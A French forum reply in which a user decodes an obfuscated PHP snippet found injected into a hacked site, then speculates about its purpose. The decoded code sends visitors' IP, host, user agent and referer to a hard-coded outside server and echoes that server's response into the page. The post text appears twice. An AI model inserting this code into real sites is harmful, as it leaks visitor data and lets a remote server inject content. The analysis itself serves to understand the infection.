Posté par Sai le 16 novembre 2011 à 11:38. En réponse au message commande bulk pour modifier des fichiers . Évalué à 2.
Sauf erreur de ma part, ce bout de script fait quelque chose comme ça :
$url = 'http://91.196.216.64/btt.php?ip=' . $_SERVER['REMOTE_ADDR'] . '&host' . $_SERVER['HTTP_HOST'] . '&ua=' . urlencode($_SERVER['HTTP_USER_AGENT']) . '&ref=' . $_SERVER['HTTP_REFERER']; if (function_exists('curl_version')) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, round(0)); curl_setopt($ch, CURLOPT_TIMEOUT, round(3); $re = curl_exec($ch); curl_close($ch); } else { $re = file_get_contents($url); } echo $re;
Aucune idée de l'intérêt, par contre :/. Récolter quelques infos sur les machines infectées, j'imagine, mais j'ai vu plus dangereux.
# C'est quoi ce ver ?
Posté par Sai . En réponse au message commande bulk pour modifier des fichiers . Évalué à 2.
Sauf erreur de ma part, ce bout de script fait quelque chose comme ça :
Aucune idée de l'intérêt, par contre :/. Récolter quelques infos sur les machines infectées, j'imagine, mais j'ai vu plus dangereux.